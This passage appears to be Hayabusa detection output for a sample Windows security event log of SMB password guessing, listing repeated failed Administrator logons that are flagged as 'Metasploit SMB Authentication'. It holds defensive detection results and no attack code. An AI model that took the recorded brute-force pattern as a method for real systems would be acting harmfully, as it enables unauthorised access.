Password,User: Administrator : Type: 3 : Workstation: dqeLFLRT5EXiCBUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dx3tco9up7XnOa7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZdNX4ubtpQaV9EeF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S05I0ZlGKGazkVkL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzbfrYSYhxH6WcCt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGTvXs8Mlc0Fi7iT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1LjtTFjPfPlBqAi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lhJW3iO1xGGTMhp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMz7WmlBTgadVgN8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OB02epCA5pc5oBeJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: KAFgReUMtu9VerRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ByeL26yQfohpQT3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 527r3nh9ocmItXfL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNeC1BBFVXv839Ys : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: juXXpQcoPfJLMQ3L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: njNdv4lGnsUpooCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j6VchLhWJT7cCWVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r3xxnFpbd8zkFm0h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtf156NEpOebQHGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17O1jfGX6KQMPgnD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 3NaqTqrCiPPfNxZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Az7cwIWXUGVIMTv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Djaxf99PVs2VkMy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbTSoTdaQ0Y4c9Gw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g9aTo4QBHfrgPYZ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dpHKjYzZTn0ruIrf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HqhPnV6tc8airRqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RIOCqtXh5ji12U5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwuGZ0kgg1yToLlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZSBbd4qBRuzeKBjD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8zS1Muxc9gpcqv23 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c6wiIkfkgtso42P1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1ilRmhSB5RfvpVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PuQ47GGBraimypWL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UfUsAYWilbwMScpE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22ZSltGNwIl0DNDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IYwG9IUpdk5DmM8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a8kbGxQFHDBodGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KoLqIaO8p3k9kOkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUnonSx3ZBdkyGhu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: d1QJziwKhsaJljGV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZhcNRrpODYB9jZxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yi5JE53caVn7n54w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jx6qTASzFp830ud6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4L8HtBWlmAMTjCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4hVfTwibHreepku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3TlapK211UT8SO0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
